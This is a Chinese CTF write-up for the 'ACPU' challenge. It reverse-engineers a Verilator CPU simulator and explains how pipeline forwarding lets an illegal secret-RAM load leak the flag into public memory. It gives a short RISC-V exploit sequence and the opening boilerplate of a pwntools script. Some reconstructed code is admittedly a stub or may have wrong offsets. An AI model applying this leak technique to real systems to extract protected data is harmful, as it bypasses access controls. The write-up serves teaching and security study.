ACPU
这题的Simulation是一个小型 CPU 仿真二进制文件,用 Verilator 将 SystemVerilog 转成 C++ 二进制模拟
先看懂其中核心函数逻辑:
函数:main
int main(int argc, char **argv) {
VerilatedContext *ctx = new VerilatedContext();
ctx->commandArgs(argc, argv);
VCPU *cpu = new VCPU(ctx, "Simulation");
// Verilator 的主循环:不断推进一个时隙,直到没有挂起事件。
while (!ctx->gotFinish()) {
cpu->eval_step();
if (cpu->eventsPending()) {
ctx->time(cpu->nextTimeSlot());
}
}
delete cpu;
delete ctx;
return 0;
}
函数:VCPU___024root___eval_initial__TOP(读取输入文件并初始化 cache/RAM 状态)
// Initial-block logic of the model: loads the two memory image files and
// clears the public cache lines.
//   root - model state; the arrays are addressed by their root offsets.
void eval_initial_top(Root *root) {
// Load "rom_file.mem" into root->mem_array_0x368.
// NOTE(review): 32 and 0x800 are presumably the word width and the depth in
// words — confirm against Verilator's VL_READMEM_N.
VL_READMEM_N(true, 32, 0x800, "rom_file.mem", root->mem_array_0x368);
// Load "flag.mem" into root->mem_array_0x63e8 (same call shape, 0x100 entries).
VL_READMEM_N(true, 32, 0x100, "flag.mem", root->mem_array_0x63e8);
// Zero the whole public_cache_lines array.
memset(root->public_cache_lines, 0, sizeof(root->public_cache_lines));
}
函数:VCPU___024root___nba_sequent__TOP__0(题目核心处理逻辑)
/*
 * One record of per-stage pipeline signals. step_core_logic overlays seven of
 * these on the model state at root + 0x018 + k * 0x58, so the record must be
 * exactly 0x58 bytes. The named fields only cover 0x50 bytes with natural
 * alignment; the trailing reserved bytes make sizeof match the stride.
 *
 * NOTE(review): root-relative offsets quoted elsewhere in these notes
 * (e.g. root+0x210 for p5.wback with p5 at root+0x1d0) suggest the 8
 * unaccounted bytes may actually sit before jimm rather than at the end —
 * confirm against the binary before trusting offsets from +0x2c onwards.
 */
struct Signals {
    uint32_t pc;               // +0x00
    uint32_t insn;             // +0x04
    uint8_t privileged;        // +0x08
    uint8_t bad_inst;          // +0x09
    uint8_t rs1;               // +0x0a
    uint8_t rs2;               // +0x0b
    uint32_t reg1;             // +0x0c
    uint32_t reg2;             // +0x10
    uint32_t op;               // +0x14
    uint32_t imm;              // +0x18
    uint32_t asel;             // +0x1c
    uint32_t bsel;             // +0x20
    uint32_t selector;         // +0x24
    uint8_t pcsel;             // +0x28
    uint8_t flag_zero;         // +0x29
    uint8_t flag_carry;        // +0x2a
    uint8_t cond;              // +0x2b
    uint32_t jimm;             // +0x2c
    uint8_t branch;            // +0x30
    uint8_t memr;              // +0x31
    uint8_t memw;              // +0x32
    uint32_t memt;             // +0x34
    uint8_t wback;             // +0x38
    uint8_t rd;                // +0x39
    uint64_t wdata;            // +0x40
    uint8_t sys_wback;         // +0x48
    uint16_t sys_wreg;         // +0x4a
    uint32_t sys_wdata;        // +0x4c
    uint8_t reserved_0x50[8];  // +0x50, unidentified bytes up to the 0x58 stride
}; // size = 0x58
/* Sign-extend the low 8 bits of x to a 32-bit value; upper bits of x are ignored. */
static inline uint32_t sext8(uint32_t x) {
    const uint32_t low = x & 0xffu;
    /* Flip the sign bit, then subtract it back: wraps to all-ones above bit 7 when it was set. */
    return (low ^ 0x80u) - 0x80u;
}
/* Sign-extend the low 16 bits of x to a 32-bit value; upper bits of x are ignored. */
static inline uint32_t sext16(uint32_t x) {
    const uint32_t low = x & 0xffffu;
    /* Flip the sign bit, then subtract it back: wraps to all-ones above bit 15 when it was set. */
    return (low ^ 0x8000u) - 0x8000u;
}
/*
 * Turn a raw 32-bit memory word into the value a load returns.
 *   raw   - word read from memory
 *   memt  - load kind: 0 = LB, 1 = LH, 2 = LW, 3 = LBU, 4 = LHU
 *   shift - right shift in bits applied to raw before the value is interpreted
 * Returns the sign- or zero-extended result; any other memt yields 0.
 */
static inline uint32_t extract_load_result(uint32_t raw, uint32_t memt, uint8_t shift) {
    const uint32_t lane = raw >> shift;

    if (memt == 0) {
        return sext8(lane);        /* LB: signed byte */
    }
    if (memt == 1) {
        return sext16(lane);       /* LH: signed halfword */
    }
    if (memt == 2) {
        return lane;               /* LW: shifted word as-is */
    }
    if (memt == 3) {
        return lane & 0xff;        /* LBU: unsigned byte */
    }
    if (memt == 4) {
        return lane & 0xffff;      /* LHU: unsigned halfword */
    }
    return 0;
}
/*
 * Replace one 8-bit lane of mem[idx] with value.
 *   shift - bit position of the lane's least significant bit
 * All other bits of the word are preserved.
 */
static inline void write_byte_lane(uint32_t *mem, uint32_t idx, uint8_t shift, uint8_t value) {
    const uint32_t lane = 0xffu << shift;
    const uint32_t inserted = (uint32_t)value << shift;
    uint32_t word = mem[idx];

    word &= ~lane;      /* clear the target lane */
    word |= inserted;   /* drop the new byte in */
    mem[idx] = word;
}
// The individual cases are add/sub/xor/or/not/shift/slt/sltu-style operations.
// Operand roles as written here: shifts move b by the low 5 bits of a, and the
// two comparisons test b < a (signed for op 10, unsigned for op 11).
// Returns the 32-bit result zero-extended to 64 bits; unknown ops return 0.
static inline uint64_t execute_selector_result(uint32_t op, uint32_t a, uint32_t b) {
    const uint32_t amount = a & 0x1f;
    uint32_t out;

    switch (op) {
    case 0:
        out = a + b;
        break;
    case 1:
        out = a - b;
        break;
    case 2:
        out = a ^ b;
        break;
    case 3:
        out = a | b;
        break;
    case 4:
        out = ~b;
        break;
    case 5:
        out = b << amount;
        break;
    case 8:
        out = b >> amount;
        break;
    case 9:
        out = (uint32_t)(((int32_t)b) >> amount);
        break;
    case 10:
        out = ((int32_t)b < (int32_t)a) ? 1u : 0u;
        break;
    case 11:
        out = (b < a) ? 1u : 0u;
        break;
    default:
        out = 0;
        break;
    }
    return (uint64_t)out;
}
// Placeholder for the CPU front end's large decode unit, which translates
// instructions into pipeline signals. The real logic is too complex to
// reproduce here, so only its role and its input/output boundary are kept;
// this stub performs no work.
static inline void decode_frontend_and_build_controls(
    void *root,
    Signals &p0,
    Signals &p1,
    Signals &p2,
    Signals &p3,
    Signals &p4,
    uint32_t fetched_insn,
    uint64_t fetched_pc_and_insn)
{
    // What the real unit does:
    //   1. Derives rs1/rs2/imm/jimm/selector/op/memt/wback/rd/sys_* from
    //      p3 / p4 / the current fetched_insn.
    //   2. Maintains the control bits at root+0x280/0x281/0x28d/0x28e/0x28f/0x290/0x291.
    //   3. Maintains the front-end / immediate scratch slots at root+0x314/0x318/0x31c.
    //
    // Only the true input/output boundary is preserved; every argument is
    // marked as intentionally unused.
    (void)root;
    (void)p0;
    (void)p1;
    (void)p2;
    (void)p3;
    (void)p4;
    (void)fetched_insn;
    (void)fetched_pc_and_insn;
}
// step_core_logic: one evaluation of the reconstructed sequential core logic.
// The seven Signals records p0..p6 are overlaid on root at 0x018 + k * 0x58.
// The function works on local copies (next_p0..next_p6, next_fetch_pc,
// next_delay_a/b) and writes them back at the commit_all label. The numbered
// sections follow the original reverse-engineering notes.
// NOTE(review): miss_active and public_miss are never assigned after their
// initialisation, so section 13 always stores them as false.
void step_core_logic(Root *root) {
Signals &p0 = *(Signals *)((char *)root + 0x018);
Signals &p1 = *(Signals *)((char *)root + 0x070);
Signals &p2 = *(Signals *)((char *)root + 0x0c8);
Signals &p3 = *(Signals *)((char *)root + 0x120);
Signals &p4 = *(Signals *)((char *)root + 0x178);
Signals &p5 = *(Signals *)((char *)root + 0x1d0);
Signals &p6 = *(Signals *)((char *)root + 0x228);
// Snapshot the current stage records; all updates go to the next_* copies.
Signals next_p0 = p0;
Signals next_p1 = p1;
Signals next_p2 = p2;
Signals next_p3 = p3;
Signals next_p4 = p4;
Signals next_p5 = p5;
Signals next_p6 = p6;
uint32_t next_fetch_pc = root->field_0x320;
uint8_t next_delay_a = root->byte_0x294;
uint8_t next_delay_b = root->byte_0x293;
// Per-call decisions computed in section 4 and consumed in sections 6/13.
bool secret_access = false;
bool public_access = false;
bool illegal_load = false;
bool illegal_store = false;
bool cache_hit = false;
bool public_fill_line = false;
bool miss_active = false;
bool public_miss = false;
bool take_secret_write = false;
bool take_public_byte_write = false;
bool take_public_half_write = false;
bool take_public_word_write = false;
uint32_t raw_mem_word = 0;
uint32_t selected_public_word = 0;
uint32_t public_line_base = 0;
uint32_t public_word_index = 0;
uint16_t secret_index = 0;
uint16_t public_index_byte = 0;
uint16_t public_index_half = 0;
uint16_t public_index_word = 0;
uint8_t public_byte_shift = 0;
uint8_t public_half_shift = 0;
uint8_t public_word_shift = 0;
uint8_t public_byte_value = 0;
uint8_t public_half_value = 0;
uint8_t public_word_value = 0;
// ----------------------------------------------------------------
// 1. reset / power-on path
//    Clears state, zeroes every stage record, then jumps straight to
//    commit_all, skipping sections 2-13.
// ----------------------------------------------------------------
if (root->byte_0x14) {
root->field_0x32c = 0x20;
root->field_0x350 = 0x1000000010ULL;
root->field_0x308 = 0;
memset((char *)root + 0x2368, 0, 0x60);
memset((char *)root + 0x27740, 0, 0x80);
memset((char *)root + 0x277c0, 0, 0x40);
memset((char *)root + 0x27810, 0, 0x3e0);
next_p0 = {};
next_p1 = {};
next_p2 = {};
next_p3 = {};
next_p4 = {};
next_p5 = {};
next_p6 = {};
// memt == 4 is the value section 5 requires of p0 before it fetches.
next_p0.memt = 4;
root->field_0x340 = 0;
root->field_0x34c = 0;
root->byte_0x28f = 0;
root->byte_0x290 = 0;
root->byte_0x291 = 0;
root->byte_0x292 = 0;
goto commit_all;
}
// ----------------------------------------------------------------
// 2. Line snapshot for the public fill flagged on the previous step
//    (byte_0x291 is written from public_fill_line in section 13).
// ----------------------------------------------------------------
if (root->byte_0x291) {
root->field_0x354 = 0x10;
public_line_base = (uint32_t)(root->qword_0x1c0 >> 10);
public_word_index = (uint32_t)((root->qword_0x1c0 >> 6) & 0xf);
// NOTE(review): root + 0x70 is also where p1 is overlaid — confirm the
// destination offset against the binary.
memcpy((char *)root + 0x70, (char *)root + 0x27740, 0x40);
public_fill_line = true;
} else {
memset((char *)root + 0x70, 0, 0x40);
public_fill_line = false;
}
// ----------------------------------------------------------------
// 3. PC / cycle / delay state advance
// ----------------------------------------------------------------
if ((root->byte_0x13 & 1) == 0) {
next_fetch_pc += 4;
// byte_0x1f8 / field_0x204 are written in section 11 from
// branch_taken_temp / branch_target_temp: a taken branch overrides pc + 4.
if (root->byte_0x1f8) {
next_fetch_pc = root->field_0x204;
}
}
root->field_0x308++;
if (root->byte_0x295) {
next_delay_a = 2;
next_delay_b = 1;
} else if (next_delay_b) {
// Count delay_a down to zero, then clear delay_b.
if (next_delay_a) next_delay_a = (next_delay_a - 1) & 3;
else next_delay_b = 0;
}
// ----------------------------------------------------------------
// 4. public / secret memory-access dispatch
// ----------------------------------------------------------------
{
uint32_t addr = (uint32_t)root->qword_0x1c0;
// Top two address bits choose the region: 0 = public, 2 = secret.
uint32_t region = addr >> 30;
// Proceed only if some request bit is enabled and not masked.
if (((~root->mem_req_mask) & root->mem_req_enable) != 0) {
if (region == 0) {
public_access = true;
if (root->byte_0x28d & 0x2) {
public_byte_shift = 8;
public_index_byte = (addr >> 2);
public_byte_value = (uint8_t)(root->store_word >> 8);
if (public_index_byte <= 0x83d5) take_public_byte_write = true;
}
if (root->byte_0x28d & 0x4) {
public_half_shift = 16;
public_index_half = (addr >> 2);
public_half_value = (uint8_t)(root->store_word >> 16);
if (public_index_half <= 0x83d5) take_public_half_write = true;
}
if (root->byte_0x28d & 0x8) {
// NOTE(review): the shift and value here come from address bits 24..31,
// unlike the two cases above — confirm against the binary.
public_word_shift = (addr >> 24) & 0xff;
public_index_word = (addr >> 2) & 0xffff;
public_word_value = public_word_shift;
if (public_index_word <= 0x83d5) take_public_word_write = true;
}
if (root->load_enable_from_stage4) {
// Cache lookup: line index from addr bits 6..9, tag from bits 10 and up.
uint8_t line = (addr >> 6) & 0xf;
uint32_t line_tag = addr >> 10;
cache_hit =
(root->public_cache_tag[line] == line_tag) &&
root->public_cache_valid[line];
root->byte_0x292 = cache_hit;
if (cache_hit) {
selected_public_word = root->public_cache_data_0x27810[(line << 4) + ((addr >> 2) & 0xf)];
} else {
selected_public_word = root->public_mem_0x67e8[addr >> 2];
}
root->field_0x348 = selected_public_word;
}
} else if (region == 2) {
secret_access = true;
secret_index = (addr >> 2) & 0x3f;
// The secret word is read and latched into field_0x340 before any
// legality check is evaluated.
raw_mem_word = root->secret_mem_0x63e8[secret_index];
root->field_0x340 = raw_mem_word;
// byte_0x290 holds secret_access from the previous step (see section 13).
illegal_load = root->load_enable_from_stage4 && !root->byte_0x290;
illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;
if (root->secret_store_enable && !illegal_store) {
take_secret_write = true;
}
}
}
if (region == 0) {
raw_mem_word = root->field_0x348;
root->field_0x340 = raw_mem_word;
}
// The load result is formatted from field_0x340 regardless of illegal_load.
root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
// NOTE(review): root + 0x231 is p6 (root + 0x228) + 0x09, i.e. the offset
// documented for bad_inst — presumably marks the instruction bad; confirm.
if (illegal_load) root->byte_0x231 = 1;
}
// ----------------------------------------------------------------
// 5. Instruction fetch
// ----------------------------------------------------------------
if ((p0.memt != 4) || p0.bad_inst) {
// Puts 0x13 in the upper 32 bits of the 64-bit value. NOTE(review):
// presumably the instruction half of a {pc, insn} pair (0x13 encodes
// RISC-V `addi x0, x0, 0`) — confirm.
root->field_0x30c = (uint64_t)0x13 << 32;
} else if ((root->byte_0x13 & 1) == 0) {
root->field_0x30c = next_fetch_pc;
// ROM is indexed by word and wraps at 0x800 entries.
root->field_0x310 = root->rom_words_0x368[(next_fetch_pc >> 2) & 0x7ff];
}
// ----------------------------------------------------------------
// 6. public fill / RAM write-back side effects
// ----------------------------------------------------------------
if (public_fill_line) {
uint8_t line = ((uint32_t)root->qword_0x1c0 >> 6) & 0xf;
root->public_cache_valid[line] = 1;
root->public_cache_tag[line] = public_line_base;
}
if (take_secret_write) {
root->secret_mem_0x63e8[secret_index] = root->secret_store_value;
}
if (take_public_byte_write) {
write_byte_lane(root->public_mem_0x67e8, public_index_byte, public_byte_shift, public_byte_value);
}
if (take_public_half_write) {
write_byte_lane(root->public_mem_0x67e8, public_index_half, public_half_shift, public_half_value);
}
if (take_public_word_write) {
write_byte_lane(root->public_mem_0x67e8, public_index_word, public_word_shift, public_word_value);
}
// ----------------------------------------------------------------
// 7. Front-end decode / immediates / control-signal generation
// ----------------------------------------------------------------
decode_frontend_and_build_controls(
root, next_p0, next_p1, next_p2, next_p3, next_p4,
root->field_0x310, root->field_0x30c);
// ----------------------------------------------------------------
// 8. Advance p1 -> p2 and patch in reg1 / imm
//    (this overwrites whatever the decode call left in next_p2)
// ----------------------------------------------------------------
next_p2 = p1;
next_p2.reg1 = root->field_0x314;
next_p2.imm = root->field_0x31c;
// ----------------------------------------------------------------
// 9. ALU / execute result
// ----------------------------------------------------------------
root->field_0x360 = execute_selector_result(p3.op, p3.reg1, p3.reg2);
// ----------------------------------------------------------------
// 10. Write p3's execute result into p5
// root+0x210/0x211/0x218/0x220/0x222/0x224 are p5.{wback,rd,wdata,sys_wback,sys_wreg,sys_wdata}
// NOTE(review): with p5 at root+0x1d0 these imply wback at +0x40, which
// differs from the +0x38 offset noted on struct Signals — confirm.
// ----------------------------------------------------------------
{
uint64_t exec64 = root->field_0x360;
uint32_t exec32 = (uint32_t)exec64;
uint8_t exec_hi = (uint32_t)(exec64 >> 32);
next_p5.rd = root->exec_rd_temp;
next_p5.wdata = exec64;
if (p3.sys_wback) {
// System write-back: the register index is the low 12 bits of imm, and
// wback is set only when the 32-bit execute result is zero.
next_p5.wback = (exec32 == 0);
next_p5.sys_wback = 1;
next_p5.sys_wreg = p3.imm & 0xfff;
next_p5.sys_wdata = root->exec_sys_value;
} else {
next_p5.wback = (p3.wback & 1);
next_p5.sys_wback = 0;
next_p5.sys_wreg = 0;
next_p5.sys_wdata = 0;
}
root->byte_0x28b = (exec32 == 0);
root->byte_0x28c = exec_hi;
root->byte_0x284 = root->cmp_result_kind;
}
// ----------------------------------------------------------------
// 11. Advance p4 -> p6 and latch the branch outcome used by section 3
// ----------------------------------------------------------------
next_p6 = p4;
root->field_0x204 = root->branch_target_temp;
root->byte_0x1f8 = root->branch_taken_temp;
root->byte_0x1f9 = root->branch_zero_temp;
root->byte_0x1fa = root->branch_carry_temp;
// ----------------------------------------------------------------
// 12. Key second half: the load result is written into p6.wdata
// ----------------------------------------------------------------
next_p6.wdata = root->field_0x34c;
// illegal_load does not stop the data from entering p6.wdata;
// what it blocks is the final write-back
if (root->byte_0x28f || root->late_kill_flag) {
next_p6.wback = 0;
}
// secret_access / late kill clears the destination register
if (root->byte_0x290 || root->late_kill_flag) {
next_p6.rd = 0;
}
// it also clears one extra side flag along the way
if (root->byte_0x28f || root->late_kill_flag) {
root->byte_0x268 = 0;
}
// ----------------------------------------------------------------
// 13. Publish the externally observable state
// ----------------------------------------------------------------
root->byte_0x290 = secret_access;
root->byte_0x291 = public_fill_line;
root->byte_0x292 = cache_hit;
root->byte_illegal_load = illegal_load;
root->byte_illegal_store = illegal_store;
root->byte_public_access = public_access;
root->byte_miss_active = miss_active;
root->byte_public_miss = public_miss;
root->field_public_line_base = public_line_base;
root->field_public_word_index = public_word_index;
commit_all:
// ----------------------------------------------------------------
// 14. Commit everything back to root in one place
// ----------------------------------------------------------------
p0 = next_p0;
p1 = next_p1;
p2 = next_p2;
p3 = next_p3;
p4 = next_p4;
p5 = next_p5;
p6 = next_p6;
root->field_0x320 = next_fetch_pc;
root->byte_0x294 = next_delay_a;
root->byte_0x293 = next_delay_b;
}
这题的外层run.py的逻辑就是把用户输入的base64内容解码从 rom_file.mem的0x100位置写入,最大len为0x800,并且把flag.txt的内容存入 flag.mem,然后运行Simulation。
从VCPU___024root___eval_initial__TOP里我们可以看到,初始化时会把flag.mem读进root + 0x63e8数组,在VCPU___024root___nba_sequent__TOP__0里对应的是secret_mem_0x63e8,会把rom_file.mem读进root->mem_array_0x368,在VCPU___024root___nba_sequent__TOP__0里对应的是rom_words_0x368。
也就是flag被存在Secret RAM里,我们要想办法从里面读取数据。
所以我们先看VCPU___024root___nba_sequent__TOP__0里的读取逻辑,也就是"4.public / secret 访存分流"那部分
// ----------------------------------------------------------------
// 4. public / secret 访存分流
// ----------------------------------------------------------------
{
uint32_t addr = (uint32_t)root->qword_0x1c0;
uint32_t region = addr >> 30;
if (((~root->mem_req_mask) & root->mem_req_enable) != 0) {
......
else if (region == 2) {
secret_access = true;
secret_index = (addr >> 2) & 0x3f;
raw_mem_word = root->secret_mem_0x63e8[secret_index];
root->field_0x340 = raw_mem_word;
illegal_load = root->load_enable_from_stage4 && !root->byte_0x290;
illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;
if (root->secret_store_enable && !illegal_store) {
take_secret_write = true;
}
}
}
root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
if (illegal_load) root->byte_0x231 = 1;
}
if ((~root->mem_req_mask) & root->mem_req_enable)
- root->mem_req_enable → 内存请求有效位(load/store 请求是否发出)
- root->mem_req_mask → 内存请求屏蔽位(屏蔽某些请求)
- ~root->mem_req_mask → 取反,得到允许的 bit 位
- 条件成立:
- 同时满足:请求有效,并且没有被屏蔽
uint32_t addr = (uint32_t)root->qword_0x1c0;
取出这次访存地址
uint32_t region = addr >> 30; if (region == 2)
这里是用地址高位判断访问区域:
- region == 0:public 区
- region == 2:secret 区
secret_index = (addr >> 2) & 0x3f;
- 地址先右移 2 位,代表按 word 访问(因为 CPU 内存是按 word(32-bit)对齐访问的,一个 word = 4 字节,所以地址右移 2 位,就是把 byte 地址转换成 word 地址)
- 再取低 6 位,说明secret 区一共按64 个word 编址(索引范围 0~63)
raw_mem_word = root->secret_mem_0x63e8[secret_index];
- 按刚算出来的 secret_index
- 从 secret_mem_0x63e8 里读一个 32-bit word
- 放进 raw_mem_word
这一步已经把 secret RAM 的内容取出来了
root->field_0x340 = raw_mem_word;
把 secret RAM 的内容转移到 root->field_0x340
illegal_load = root->load_enable_from_stage4 && !root->byte_0x290;
这句是在判断:这次 secret 访问是不是非法的 load。
- root->load_enable_from_stage4
表示当前这拍的这次 secret 访存,其实是一个 load
- !root->byte_0x290
表示当前不具备访问 secret 的权限
所以这句的含义就是:如果当前是在做一次 load,而且当前没有 secret 权限,那么这次就是 illegal load。
illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;
这句和上一句完全类似,只不过它判断的是:这次 secret 访问是不是非法的 store。
也就是:
- 如果这次是 store
- 并且没有 secret 权限
- 那就把 illegal_store 置真
if (root->secret_store_enable && !illegal_store) {
意思是:
- 如果当前这次操作本来就打算往 secret RAM 写
- 并且这次写不是非法的
那就允许它进入真正的写回阶段。
take_secret_write = true;
这句不是立刻写 RAM,意思是:
- 先记一个“待写回”的标志
- 稍后在统一提交阶段,才真正把值写进 secret_mem_0x63e8
root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
意思是:
- 不管前面 raw_mem_word 是从 public 还是 secret 来的
- 现在都统一拿 root->field_0x340
- 根据 load 类型 p4.memt
- 再根据字内偏移 root->byte_0x28e
- 生成最终的 load 结果
- 存进 root->field_0x34c
也就是:
- 0x340 是原始 32-bit word
- 0x34c 是 CPU 真正整理好的 load 返回值
if (illegal_load) root->byte_0x231 = 1;
这句是在记录一个异常/违规标志。
意思是:
- 如果刚才判定这是一次非法 load
- 就把 root->byte_0x231 置 1
也就是给后面的异常处理/kill 逻辑打一个标记:这拍发生了 illegal load。
我们现在看 extract_load_result()是怎么处理的:
static inline uint32_t extract_load_result(uint32_t raw, uint32_t memt, uint8_t shift) {
uint32_t v = raw >> shift;
switch (memt) {
case 0: return sext8(v); // LB
case 1: return sext16(v); // LH
case 2: return v; // LW
case 3: return v & 0xff; // LBU
case 4: return v & 0xffff; // LHU
default: return 0;
}
}
第一步:
uint32_t v = raw >> shift;
这一步是在做“字内选字节/半字”。
比如一个 raw_mem_word 是:
[b3 b2 b1 b0]
如果:
- shift = 0,从最低字节开始取
- shift = 8,相当于把第二个字节移到最低位
- shift = 16,取第三个字节
- shift = 24,取第四个字节
所以它是在从一个 32-bit word 里抽真正要load的那一部分。
第二步:按 load 类型解释
memt 决定这是哪种 load:
- 0 -> LB
- 1 -> LH
- 2 -> LW
- 3 -> LBU
- 4 -> LHU
对应行为:
case 0: return sext8(v);
取低 8 位,并做符号扩展
case 1: return sext16(v);
取低 16 位,并做符号扩展
case 2: return v;
直接返回 32 位 word
case 3: return v & 0xff;
取低 8 位,但不符号扩展
case 4: return v & 0xffff;
取低 16 位,但不符号扩展
所以如果题目用的是 lw,那这一层几乎没有损失。
我们继续追踪field_0x34c:
// ----------------------------------------------------------------
// 12. 关键后半段:load 结果写进 p6.wdata
// ----------------------------------------------------------------
next_p6.wdata = root->field_0x34c;
// illegal_load 不会阻止数据进入 p6.wdata;
// 它拦的是最终写回
if (root->byte_0x28f || root->late_kill_flag) {
next_p6.wback = 0;
}
// secret_access / late kill 会把目的寄存器清掉
if (root->byte_0x290 || root->late_kill_flag) {
next_p6.rd = 0;
}
// 还会顺手清一组 side flag
if (root->byte_0x28f || root->late_kill_flag) {
root->byte_0x268 = 0;
}
next_p6.wdata = root->field_0x34c;
意思是:
- field_0x34c 是整理好的 load 结果
- 现在它被放进 p6.wdata
- p6 是最后一级的那组 Signals
也就是说,到这里为止,secret 数据已经不是停留在 memory 子系统里,而是已经进入写回级数据槽了。
if (root->byte_0x28f || root->late_kill_flag) { next_p6.wback = 0; }
意思是:
- 如果发生了 illegal_load 这类 kill 条件
- 那就把 p6.wback 清零
wback 是一个是否要写入的标记位,代表最终要不要真的把 wdata 写进寄存器堆,清零就代表:
- wdata 还在
- 但“不允许正式提交”
if (root->byte_0x290 || root->late_kill_flag) { next_p6.rd = 0; }
意思是:
- 如果是 secret 访问或者进入某个 kill 状态
- 那就把目标寄存器号清成 0
所以这句是在进一步保证:
这次非法得到的 load 结果,不会以“正常寄存器写回”的形式保留下来。
if (root->byte_0x28f || root->late_kill_flag) { root->byte_0x268 = 0; }
条件如上,也是非法时清空,对解题不太重要
我们现在可以总结一下了:
secret RAM的内容可以被读出来存进 p6.wdata,但是最后 wback 被清零,rd 也被抹掉
也就是:
- 数据路径是通的
- 只是最终提交被拦了
那下一步该怎么做呢,我们要先了解一下CPU Forwarding:
假设一个简单的 5 级流水线 CPU(Fetch → Decode → Execute → Memory → Writeback),有这样两条指令:
1. add r1, r2, r3 ; r1 = r2 + r3
2. sub r4, r1, r5 ; r4 = r1 - r5
- 问题:第二条指令需要用到 r1 的值,但 r1 还没写回到寄存器堆(Writeback 阶段还没到)
- 直接从寄存器堆读会得到旧值 → 数据冒险
Forwarding 的核心思路是:
- 不用等寄存器写回
- 直接从 pipeline 中 上一条指令的中间阶段(ALU 输出 / memory 输出) 拿数据给下一条指令
举例:
EX stage of add r1 = ALU_out
EX stage of sub r4 = get r1 from previous EX stage instead of regfile
- 这样第二条指令就能立即拿到正确的 r1 值,而不需要停顿
Forwarding 的典型路径:
| 来源阶段 | 目的阶段 | 说明 |
|---|---|---|
| EX / MEM | EX | ALU 结果直接给下一条指令的 ALU 使用 |
| MEM | EX | Load 结果给下一条指令 ALU 使用(load-use hazard) |
| MEM / WB | MEM | 写回数据给 memory store 使用 |
我们如果这样操作:
words += li32(5, 0x80000000)
words.append(lw(7, 0, 5))
words.append(sw(7, 0, 0))
words.append(lw(10, 0, 0))
words += li32(6, 0x2000)
words.append(jalr(0, 0, 6))
对应的汇编逻辑是:
li32 t0, 0x80000000
lw t2, 0(t0)
sw t2, 0(x0)
lw a0, 0(x0)
li32 t1, 0x2000
jalr x0, 0(t1)
1. 0x80000000 是什么:
这是 secret 区的基址。
我们前面已经从 step_core_logic 里确认过,访存时会先做:
region = addr >> 30;
然后:
- region == 0:public 区
- region == 2:secret 区
而:
0x80000000 >> 30 = 2
因为 0x80000000 的最高两位是 10。
所以把地址设成 0x80000000,就是在访问 secret RAM 的第 0 个 word。
也就是 flag 开头那 4 个字节所在的位置。
2. 5、7、10 代表什么:
这些是寄存器编号。
RISC-V 有 32 个通用寄存器:
x0到x31
其中一些有 ABI 别名,常用的是:
- x5 = t0
- x6 = t1
- x7 = t2
- x10 = a0
特殊地,x0 是RISC-V里永远为 0 的寄存器,写进去的值会被丢掉
3.具体流程:
按顺序看:
第一步
li32 t0, 0x80000000
把 t0 设成 secret 基址。
所以:
t0 = 0x80000000
第二步
lw t2, 0(t0)
从 0x80000000 读一个 32-bit word。
这里实际读到的是 flag 的前 4 个字节,也就是:
'A' 'C' 'T' 'F'
按小端拼成 32 位数就是:
0x46544341
但是这次 load 属于非法 secret load,所以:
- 数据内部其实已经读出来了
- 可最后不会正常提交到 t2/x7
所以最后可以看到:
x7 = 0x00000000
第三步
sw t2, 0(x0)
它按正常语义是:
*(uint32_t *)0x0 = t2
这里的 t2 不是从寄存器堆里慢慢等出来的,而是 store-data 走了 forwarding。
也就是说:
- 前一条 lw 虽然没最终写回 x7
- 但它的结果已经在流水线内部
- sw 紧跟着来取 store-data 时,直接从 forwarding 拿到了那份 secret word
于是 public 地址 0x0 被写成了:
0x46544341
第四步
lw a0, 0(x0)
这次是从 public 地址 0x0 正常读。
所以它不会触发 secret 权限检查,能合法读回:
x10 = 0x46544341
第五步
li32 t1, 0x2000
jalr x0, 0(t1)
x0无法写入,这里表示不保存返回地址到寄存器,直接跳到 0x2000 正常结束,让模拟器把寄存器打出来,这时候x10里面就是flag的前4字节内容了。
这里0x2000这个结束地址可以通过VCPU___024root___eval_initial__TOP里的VL_READMEM_N(true, 32, 0x800, "rom_file.mem", root->mem_array_0x368);看出来,整个ROM的大小为0x800 * 4 = 0x2000 bytes,0x2000大概率是结束指令,实际测试可以发现确实是。
然后就是循环四字节取遍flag就行了。
EXP:
from pwn import *
from zenpwnpy import *
# --- pwntools session setup ---------------------------------------------
# Behaviour is selected by words on the command line:
#   gdb    -> start the binary under gdb
#   remote -> connect to `target` instead of running locally
#   deoff  -> do not force debug-level logging
#   error  -> force error-level logging
context.terminal = ['tmux', 'splitw', '-h']
target = ''
file_name = './Simulation'
elf = ELF(file_name)
context.binary = elf
context.gdb_binary = "pwndbg"
gdb_ = 1 if ('gdb' in sys.argv) else 0
switch = 1 if ('remote' in sys.argv) else 0
debug = 0 if ('deoff' in sys.argv) else 1
error = 1 if ('error' in sys.argv) else 0
if debug:
    context(log_level='debug')
if error:
    # Applied after the debug setting, so 'error' wins when both are active.
    context(log_level='error')
# Breakpoints: an int becomes a `breakrva`, a str becomes a plain `b`.
bps = [
    # 0x1234,
    # 'main',
    # (0xe3b31, 'libc'),
    # ('system', 'libc')
]
gdb_cmd = ''
if gdb_ and switch == 0:
    gdb_cmd += "set breakpoint pending on\n"
    for b in bps:
        if isinstance(b, int):
            gdb_cmd += f"breakrva {hex(b)}\n"
        elif isinstance(b, str):
            gdb_cmd += f"b {b}\n"
    gdb_cmd += "c\n"
if switch:
    # `target` is parsed as "... host port" (or "host:port"), with an
    # optional "--ssl" word anywhere in it.
    parts = target.replace(':', ' ').split()
    host = parts[-2]
    port = int(parts[-1])
    use_ssl = '--ssl' in parts
    p = remote(host, port, ssl=use_ssl, sni=host if use_ssl else None)
elif gdb_:
    p = gdb.debug(file_name, gdbscript=gdb_cmd, aslr=True)
else:
    # Local run goes through the challenge's run.py wrapper, started from
    # its own directory.
    path = "/home/zenduk/ctf/ACTF 2026/ACPU/attachment/bin/run.py"
    workspace = "/home/zenduk/ctf/ACTF 2026/ACPU/attachment/bin"
    p = process(["python3", path],cwd=workspace)
# --- Short aliases over the tube `p` --------------------------------------
# Send helpers: raw send, send after a delimiter, and the line-terminated variants.
def s(data): return p.send(data)
def sa(delim, data): return p.sendafter(delim, data)
def sl(data): return p.sendline(data)
